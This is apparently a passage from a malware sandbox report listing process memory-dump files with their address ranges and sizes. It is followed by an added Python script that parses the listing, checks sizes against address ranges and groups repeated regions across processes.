memory/2696-162-0x00007FF619400000-0x00007FF61983B000-memory.dmp    4.2MB
memory/2696-161-0x00007FF619400000-0x00007FF61983B000-memory.dmp    4.2MB
memory/2696-163-0x00007FF619400000-0x00007FF61983B000-memory.dmp    4.2MB
memory/2900-201-0x0000000140000000-0x000000014002A000-memory.dmp    168KB
memory/3192-149-0x0000000140000000-0x000000014274C000-memory.dmp    39.3MB
memory/3236-211-0x00007FF619400000-0x00007FF61983B000-memory.dmp    4.2MB
memory/3236-210-0x00007FF619400000-0x00007FF61983B000-memory.dmp    4.2MB
memory/3236-212-0x00007FF619400000-0x00007FF61983B000-memory.dmp    4.2MB
memory/3404-218-0x00007FF619400000-0x00007FF61983B000-memory.dmp    4.2MB
memory/3404-217-0x00007FF619400000-0x00007FF61983B000-memory.dmp    4.2MB
memory/3404-219-0x00007FF619400000-0x00007FF61983B000-memory.dmp    4.2MB
memory/3472-208-0x0000000140000000-0x000000014002A000-memory.dmp    168KB
memory/3688-139-0x00000000061B0000-0x0000000006226000-memory.dmp    472KB
memory/3688-127-0x0000000003080000-0x0000000003081000-memory.dmp    4KB
memory/3688-119-0x0000000000A30000-0x0000000000B0C000-memory.dmp    880KB
memory/3688-120-0x0000000000700000-0x0000000000701000-memory.dmp    4KB
memory/3688-121-0x00000000025B0000-0x00000000025F4000-memory.dmp    272KB
memory/3688-122-0x00000000767B0000-0x0000000076972000-memory.dmp    1.8MB
memory/3688-123-0x0000000077550000-0x0000000077641000-memory.dmp    964KB
memory/3688-124-0x0000000000A30000-0x0000000000B0C000-memory.dmp
880KB
-
memory/3688-125-0x0000000000A30000-0x0000000000B0C000-memory.dmpFilesize
880KB
-
memory/3688-126-0x0000000072880000-0x0000000072900000-memory.dmpFilesize
512KB
-
memory/3688-128-0x0000000005760000-0x0000000005D66000-memory.dmpFilesize
6.0MB
-
memory/3688-129-0x0000000002FC0000-0x0000000002FD2000-memory.dmpFilesize
72KB
-
memory/3688-143-0x00000000066A0000-0x00000000066F0000-memory.dmpFilesize
320KB
-
memory/3688-142-0x0000000007160000-0x000000000768C000-memory.dmpFilesize
5.2MB
-
memory/3688-141-0x0000000006390000-0x00000000063AE000-memory.dmpFilesize
120KB
-
memory/3688-140-0x0000000006730000-0x0000000006C2E000-memory.dmpFilesize
5.0MB
-
memory/3688-118-0x0000000000A30000-0x0000000000B0C000-memory.dmpFilesize
880KB
-
memory/3688-138-0x0000000006110000-0x00000000061A2000-memory.dmpFilesize
584KB
-
memory/3688-130-0x0000000005260000-0x000000000536A000-memory.dmpFilesize
1.0MB
-
memory/3688-131-0x0000000003020000-0x000000000305E000-memory.dmpFilesize
248KB
-
memory/3688-132-0x0000000005540000-0x0000000005702000-memory.dmpFilesize
1.8MB
-
memory/3688-137-0x0000000005370000-0x00000000053D6000-memory.dmpFilesize
408KB
-
memory/3688-136-0x0000000070AD0000-0x0000000070B1B000-memory.dmpFilesize
300KB
-
memory/3688-135-0x0000000003090000-0x00000000030DB000-memory.dmpFilesize
300KB
-
memory/3688-134-0x0000000074C00000-0x0000000075F48000-memory.dmpFilesize
19.3MB
-
memory/3688-133-0x0000000076980000-0x0000000076F04000-memory.dmpFilesize
5.5MB
-
memory/4100-215-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/4348-147-0x00007FF782200000-0x00007FF78263B000-memory.dmpFilesize
4.2MB
-
memory/4348-146-0x00007FF782200000-0x00007FF78263B000-memory.dmpFilesize
4.2MB
-
memory/4348-148-0x00007FF782200000-0x00007FF78263B000-memory.dmpFilesize
4.2MB
-
memory/4536-190-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/4536-189-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/4536-191-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/4792-166-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/4832-173-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/4900-170-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/4900-169-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/4900-168-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/4948-175-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/4948-176-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
-
memory/4948-177-0x00007FF619400000-0x00007FF61983B000-memory.dmpFilesize
4.2MB
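Each dump name in the listing above encodes the PID, a sequence number and the base and end address of the dumped region, and the size column should equal end minus base. The Python below is an added example, not part of the sandbox report: it parses entries in the page's layout, checks the stated size against the address range, and groups dumps by range across PIDs so that copies of one image in many processes stand out from regions that are actually different. The sample listing is a constructed subset of the entries from this report, and the size rounding rule (whole KB below 1 MiB, one-decimal MB above) is an assumption inferred from the listing.

```python
"""Parse a sandbox report's memory-dump inventory and sanity-check it.

Added example, not part of the report. Entry format and size rounding are
inferred from the listing on the page and are assumptions.
"""
import re
from collections import defaultdict

# memory/<pid>-<seq>-0x<base>-0x<end>-memory.dmp
DUMP_RE = re.compile(
    r"memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<base>[0-9A-Fa-f]+)"
    r"-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp"
)

# Constructed sample: a subset of the report's entries in the page's own
# layout (name, size, "-" separator). One name keeps the "Filesize" label
# that extraction fused onto it, to show the parser tolerates it.
SAMPLE_LISTING = """
memory/696-180-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/1032-205-0x00007FF619400000-0x00007FF61983B000-memory.dmp
4.2MB
-
memory/1060-151-0x0000000140000000-0x000000014002A000-memory.dmpFilesize
168KB
-
memory/1432-156-0x00007FF619400000-0x00007FF61983B000-memory.dmp
4.2MB
-
memory/3192-149-0x0000000140000000-0x000000014274C000-memory.dmp
39.3MB
-
memory/3688-119-0x0000000000A30000-0x0000000000B0C000-memory.dmp
880KB
-
"""


def human_size(nbytes: int) -> str:
    """Format a byte count the way the listing does (assumed rule)."""
    if nbytes < 1024 * 1024:
        return f"{nbytes // 1024}KB"
    return f"{nbytes / (1024 * 1024):.1f}MB"


def parse_dump(name: str, stated_size: str) -> dict:
    """Decode one dump name and compare its address range with the stated size."""
    m = DUMP_RE.fullmatch(name.strip().removesuffix("Filesize"))
    if not m:
        raise ValueError(f"not a memory dump entry: {name!r}")
    base, end = int(m["base"], 16), int(m["end"], 16)
    if end <= base:
        raise ValueError(f"end {end:#x} is not above base {base:#x} in {name!r}")
    nbytes = end - base
    return {
        "pid": int(m["pid"]),
        "seq": int(m["seq"]),
        "base": base,
        "end": end,
        "bytes": nbytes,
        "stated": stated_size.strip(),
        "consistent": human_size(nbytes) == stated_size.strip(),
    }


def parse_listing(text: str) -> list[dict]:
    """Parse name/size pairs laid out one per line, ignoring '-' separators."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip() and ln.strip() != "-"]
    if len(lines) % 2:
        raise ValueError("a dump name is missing its size (or vice versa)")
    return [parse_dump(name, size) for name, size in zip(lines[0::2], lines[1::2])]


def regions_by_range(entries: list[dict]) -> dict[tuple[int, int], list[int]]:
    """Group dumps by (base, end); one range seen in many PIDs is usually one image."""
    groups = defaultdict(set)
    for e in entries:
        groups[(e["base"], e["end"])].add(e["pid"])
    return {rng: sorted(pids) for rng, pids in groups.items()}


def inconsistent(entries: list[dict]) -> list[dict]:
    """Entries whose stated size does not match their address range."""
    return [e for e in entries if not e["consistent"]]


if __name__ == "__main__":
    entries = parse_listing(SAMPLE_LISTING)
    for (base, end), pids in sorted(regions_by_range(entries).items()):
        print(f"{base:#018x}-{end:#018x} {human_size(end - base):>7}  pids={pids}")
    print("size mismatches:", inconsistent(entries))
```

Run over the full table rather than the sample, the grouping shows the 4.2MB region at 0x00007FF619400000 repeated in ten PIDs and the 168KB region at 0x0000000140000000 in ten others, while the 39.3MB dump from PID 3192 and the 880KB dump from PID 3688 each stand alone; that is the short list of dumps worth opening first, since the repeated ranges are most likely the same image mapped in each process.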